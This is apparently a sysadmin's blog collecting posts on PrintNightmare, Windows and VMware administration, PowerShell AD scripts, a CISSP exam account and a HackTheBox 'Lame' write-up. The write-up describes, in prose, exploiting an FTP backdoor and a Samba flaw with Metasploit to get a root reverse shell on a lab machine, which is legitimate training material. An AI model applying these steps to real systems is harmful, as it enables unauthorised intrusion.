PrintNightmare – [0Day] Windows Critical Vulnerability

I had been watching Twitter all day yesterday and amongst all the #infosecbikini photos filling up InfoSec Twitter there was mention of this critical Windows vulnerability. At first it sounded like the June patches would protect you, then Twitter seemed to lose faith that was the case.

The US Cybersecurity & Infrastructure Security Agency (CISA) released the following notice the evening of June 30, 2021. (https://us-cert.cisa.gov/ncas/current-activity/2021/06/30/printnightmare-critical-windows-print-spooler-vulnerability)

It has been recommended to disable the Windows Print spooler service on Domain Controllers and any systems that do not print.

EDIT: As of writing this entry the best workaround I have been able to find if you need to keep print services running is here: https://blog.truesec.com/2021/06/30/fix-for-printnightmare-cve-2021-1675-exploit-to-keep-your-print-servers-running-while-a-patch-is-not-available/

EDIT 2: Microsoft has finally responded: https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527

EDIT 3: CISA put out emergency directive: https://cyber.dhs.gov/ed/21-04/

For your meme viewing pleasure:

Extending Volumes in Windows Server Core

If you add space to a Windows Server Core hard disk in a virtual platform like VMware and need to extend the disk in the Operating System you will have to complete it all via command line.

Step 1

Add the space to the hard drive in your virtualization platform

Step 2

Login to the server and launch diskpart. You can then issue the command “list disk” to see which disks are on the system and which ones have free space.

Step 3

Type in “Select Disk <number>” in order to choose the disk you want to modify. You can then issue the command “List Volume” to provide the volumes on that disk in order to find the volume you want to expand.

Step 4

As you can see from the image in “Step 2”, we have 100GB that is listed as “Free”. We want to add that free space to the currently large volume, which you can see from “Step 3” is listed as “Volume 2”.

Type in “select volume <number>” and then type in “extend” in order to extend the volume for the full length that we can.

Running another “list volume” should show that the volume size is now increased to 199GB.

Adding a UPN Suffix to Active Directory

Have you recently setup a Test Active Directory and are using it to test out your scripts but you quickly realized that the alternate UPN suffixes that you forgot you didn’t create aren’t there?

Or.. maybe you just haven’t done this in forever like myself and had to Google how to add a UPN suffix to AD.

Well if either or none of those cases match why you are reading this right now, no need to worry, I’ll tell you anyway.

Adding UPN Suffix to Active Directory

Launch Active Directory Domains and Trusts and right-click on “Active Directory Domains and Trusts [dc.domain] at the top of the left pane and click Properties.

On the next window, add the alternate UPN suffixes you want added.

You will now see these UPNs available in the drop-down menu when you create a new user account, or modify an already existing one.

HackTheBox Writeup for “Lame”

This is my first official writeup for a machine on HackTheBox

I’m trying to get better at my report writing as well as just documentation in general. I have many machines that I have pwned on HackTheBox but very little or no notes to show for it.

I’m digging into the retired boxes that I’ve previously hacked and putting together much better documentation for the process I used to hack them by re-hacking them and sharing my thought process.

LAME:

The first thing I notice on an nmap scan is FTP is open with anonymous login allowed. This is where I decided to start.

A Google search will point you to a major backdoor in this version where you just have to send a smiley face : ) in the username during login in order to trigger the backdoor on port 6200.
https://westoahu.hawaii.edu/cyber/forensics-weekly-executive-summmaries/8424-2/

The article above provides both the manual way to exploit this vulnerability and the Metasploit way. However, I could not get the Metasploit module to trigger and I could not seem to trigger the exploit manually. I also tried to login to the ftp server to see if I could do anything and found my rights limited… So, I’m moving on.

The next thing I decided to check was SMB, which is running version 3.0.20 according to nmap. Googling this version does provide potential exploits. The first exploit I find is a Rapid 7 article called “Samba username map script” for a Metasploit module called “usermap_script”

https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script/

I start up Metasploit with the command “msfconsole” and find the module that is specified in the link above and “show options” so I can see what the required parameters are.

There are two options that we need to change. RHOSTS needs to be the IP address of the machine you are attacking, and LHOST needs to be the VPN connection of your local system. The LHOST value is needed so Metasploit can properly connect a reverse shell back to your system. After setting these values we are ready to attempt an exploit.

You will see the exploit does properly fire off and although it doesn’t look like we have a shell you can type in a command and see that you really do.

There is not even any privilege escalation needed for this box, this exploit gives you ROOT. You will find the root.txt flag file under /root, and looking under /home you will find a user account name makis that contains a user.txt (/home/makis).

Server 2012R2 in place upgrade to Server 2019 on VMware

I’m personally not a fan of in place Microsoft Server upgrades but I suppose they have their time and place.

Since many of our 2012R2 servers are from the 5.1 and 5.5 days of VMware many of them are still running Virtual Hardware v9. This hardware version needs to be upgraded to perform the OS upgrade.

I was able to successfully re-create the issue with an upgrade of a clean 2012R2 install on v9 hardware. After the first reboot you will get stuck at the black screen with blue window, with no circle running underneath. I let this run for two full days (48 hours) before cancelling it.

After cancelling it and resetting the VM, you will be given the following error message:

We couldn’t install Windows Server 2019

We’ve set your PC back to the way it was right before you started installing Windows Server 2019.

0xC1900101 – 0x20017

The installation failed in the SAFE_OS phase with an error during BOOT operation

VMware generally states that you shouldn’t upgrade the VM hardware version unless there is a need. In this case there is a need.

My recommendations would be to do the following:

  1. Shut down the VM you want to perform an in place upgrade on
  2. Take a snapshot with the VM off
  3. Upgrade the Virtual Machine hardware version (We went to v15)
  4. Power on the VM, mount the ISO, run the upgrade

This process seems to be working for us, and although this may be a no-brainer, I’m putting it out there for the search engines to index in case it does help someone.

Kali Linux on Intel Macbook Pro 16″ with VMware Fusion 12.1.2

I have been struggling to figure out why Kali Linux would not update after a fresh install on VMware Fusion, virtualized on my Intel Macbook Pro 16″ laptop.

I was either receiving one of these error messages when trying to perform a “sudo apt update” on a fresh install:

The following signatures were invalid: BADSIG ED444FF07D8D0BF6 Kali Linux Repository <devel@kali.org>

OR:

apt-get updateGet:1 http://kali.mirror.garr.it/mirrors/kalikali-rolling InRelease [30.5 kB]Get:2 http://kali.mirror.garr.it/mirrors/kalikali-rolling/contribSources [66.1 kB]Get:3 http://kali.mirror.garr.it/mirrors/kalikali-rolling/non-freeSources [124 kBGet:4 http://kali.mirror.garr.it/mirrors/kalikali-rolling/mainSources [11.0 MB]Get:4 http://kali.mirror.garr.it/mirrors/kalikali-rolling/mainSources [11.0 MB]Err:4 http://kali.mirror.garr.it/mirrors/kalikali-rolling/mainSources

Hash Sum mismatchHashes of expected file:- Filesize:11015732 [weak]- SHA256:b20b6264d4bd5200e6e3cf319df56bd7fea9b2ff5c9dbd44f3e7e530a6e6b9e0- SHA1:2d8b15ab8109d678fe1810800e0be8ce3be87201 [weak]- MD5Sum:d0b5f94ba474b31f00f8911ac78258ec [weak]

Hashes of received file:- SHA256:a7b9ca82fc1a400b2e81b2ebc938542abfdbfa5aecdfa8744f60571746ec967b- SHA1:5d870530aa87398dcb11ecb07e6a25ca0746985f [weak]- MD5Sum:9a4824220c0a5fa6cb74390851116b73 [weak]- Filesize:9828918 [weak]

There seems to be an issue within VMware Fusion with the network management, trying to share a WiFi connection. I’ve read on some forums that people have had luck with sharing the connection instead of bridging it. If I try to share the connection I lose internet on my Kali VM.

The only way I can keep a connection is to bridge the connection, which gives me an IP off my wireless and lets me browse the Internet but something is being done to the traffic when trying to update which causes some security issues.

My current work around was to plug in another USB WiFI adapter and pass it through to the VM and let the VM use it to connect to my wireless in order to get out.

This only appears to be an issue when installing or updating software and I’m not quite sure what the network stack is doing underneath. When I have more time I hope to dig into this further..

Powershell: Check for deleted user accounts in AD

I have scrubbed and cleaned my next script for GitHub. This one was much easier to scrub and cleanup. This script will monitor the Active Directory Recycle Bin for deleted user objects based on a regex, with an area where you can add exceptions.

If the script finds any accounts it will send an e-mail with the samAccountName of the user accounts that were found.

The script can be found here: https://github.com/paularquette/Active-Directory/blob/main/AD_Check_For_Deleted_AccessID_User_Accounts.ps1

Monitor Active Directory Domain Controller DNS Records

I’m realizing how much work is involved to clean and sanitize code so it is very simple for someone to just copy and paste it. I’m in the hopefully not forever long process of sharing code that I use in my day job. This process is cleaning up my code so there is a net plus here.

My first script revolves around running Active Directory with an external DNS provider. We had an issue awhile back where one of our Domain Controllers dropped out of DNS and since that incident a script was written to monitor DNS.

I feel like I have a lot of knowledge and scripts to share so stay tuned there is a lot more coming!

Link to script: https://github.com/paularquette/Active-Directory/blob/main/AD_Check_DNS_For_Domain_Controllers.ps1

VMware vCenter 6.7 Certificate Status Error

After rebooting our vCenter appliance we noticed an error on vCenter regarding “Certificate Status”

After going to the Administration snap-in and clicking on “Certificate Management” and logging in to verify certificates we saw nothing out of order. All the VMware provided certificates were fine. I decided to keep digging.

I started googling and found the following command listed on Reddit by zwamkat.
https://www.reddit.com/r/vmware/comments/it4dmq/vcsa_certificate_status_alarm_triggered/

for i in $(/usr/lib/vmware-vmafd/bin/vecs-cli store list); do echo STORE $i; /usr/lib/vmware-vmafd/bin/vecs-cli entry list --store $i --text | egrep "Alias|Not After"; done

This provided the output necessary to see all certificates on the vCenter appliance, including third-party certificates. We noticed that we still had a thirty party certificate listed in vCenter with an expiration date coming up even though we already replaced it.

We are following up with the third-party vendor to get to a resolution.

My journey to passing the CISSP exam

Note: I have only passed the exam, I’m not yet certified
Update: I’m officially certified!

I have always been interested in computers for as long as I can remember. I was fortunate my high school was a Cisco Networking Academy and I walked out of high school with my Cisco Certified Network Associate (CCNA) and A+ certifications.

I went on to college and graduated in four years with a bachelor’s degree in computer science and engineering technology. While I was attending college for my bachelor’s degree I took the rest of the Cisco Networking Academy materials that would have prepared me for the Cisco Certified Network Professional (CCNP) but I never sat for the exam.

I entered the full-time work force doing desktop support and using all the resources at my disposal to go above-and-beyond what was required of me. I was noticed by the IT Infrastructure team and moved over to that team to manage Active Directory and VMware.

At the time of writing this write-up I’ve been working as a Lead Systems Software Engineer at my company for about five and a half years. In my current role I’m in charge of maintaining our companies Active Directory, VMware virtual server environments, and departmental file storage. This maintenance includes everything from running yearly audits, to providing highly available services (uptime), maintaining best practices, and securing the environments. I have also written a .NET portal to provide other Active Directory administrators a portal to perform certain functions like requesting a network file share or changing their administrator passwords. I’m also involved in our yearly Disaster Recovery planning/testing and maintaining many enterprise service certificates. My day-to-day tasks including automating our virtual server provisioning/de-provisioning process, automating daily tasks with PowerShell, and maintaining/upgrading/securing our environments.

Studying for CISSP:

I started studying for the CISSP by joining some of the free boot camps that I saw fly through my work e-mail from vendors. At this point in time I wasn’t taking any notes I was just listening and trying to absorb what I could. I’d say I attended two of these boot camps, in some cases taking some time off work to do so.

When I started to get serious about taking and passing this exam in the beginning of 2021, as I knew the exam would be changing in May. I bought the following materials:

I also recommend Kelly Handerhan’s CISSP course on Cybrary. I didn’t list this with my purchases because at the time it was included free for the month. https://www.cybrary.it/course/cissp/. I went through this whole course over a couple days and took very diligent notes in OneNote that I did use to help refresh my memory and study from.

I did spend some time studying but I was not strict about setting time aside every day, it was when I had time. I had previously scheduled my exam for March 2021 (one of the things I read to keep you motivated) but I strongly felt I was not ready and had to pay the $50 to reschedule the exam.

After rescheduling the exam at the end of April and seeing May 1, 2021, coming at me very fast, I decided it was time to really study because it was do-or-die, pass-or-fail.

I took three days off of work immediately prior to the exam, and spent all three days (8am to 8pm) studying and doing questions with only a few breaks for video games or other things enjoyable to break up the studying. I’d say I spent about 80% of time going through questions in the books and on the apps on my iPhone and 20% of the time reading the various course materials listed above and taking notes.

Prior to the exam I’d say I was averaging around 80% to 90% on the practice questions in the books and the apps. When I had first started studying for the CISSP I’d say I was more in the 60% to 70% range.

My Recommendations:

I would personally say you know yourself the best. You can read all the experiences out there from many different people but it may not help you if you don’t help yourself.

For example, I know from my high school and college experiences that I know the best way I retain knowledge is to cram over a short period of time, which is what almost everyone out there will tell you not to do, but it works for me. The three days I took off before the exam was vital to me.

I learned many of the topics I wasn’t as familiar with from doing questions, getting them wrong, and spending the time to research and really understand why the option I chose was wrong.

The CISSP exam has a special mindset that you need to acquire, many will say “Think like a manager”. I will agree with that but more importantly I will say READ, RE-READ, RE-READ, and RE-READ the questions. These questions are not written to trick you but it is important you fully understand what the question is asking.

It is very easy to fall into the trap of thinking you know what the question is asking, answering, and moving on because you are worried about time. I would recommend even if you think you know the answer to re-read the question at least three times. The next step is to rule out any answers you 100% know are incorrect. Then re-read the question again, every word, interpret it, answer to your best ability and move on.

It was very apparent to me on the questions that I did not know the answer to, I tried not to spend to much time on them, answered them to the best of ability and moved on.

Exam Experience:

I took my driver’s license and passport to the testing center to verify myself. I put everything else I brought with me into the lockers provided.

I sat down for the exam around 5pm and walked out of the testing center close to 8pm. I took no breaks but did look away from the monitor when I needed to and just took some breaths to mentally re-group.

If question 100 comes and goes and you are still answering questions don’t let it get to you. I’d say prepare for answering 150 questions and if the exam ends sooner, great. My exam went the full 150 questions.

I will say I thought I held myself well during the exam and felt fairly confident in my answers but the fact the exam went to 150 questions did start to make my question whether or not I passed.

I was preparing for the worst and was just excited I finally sat for the exam and I knew I would be better prepared for the next time. It was at that point I flipped over the piece of paper provided by the testing center to see I passed!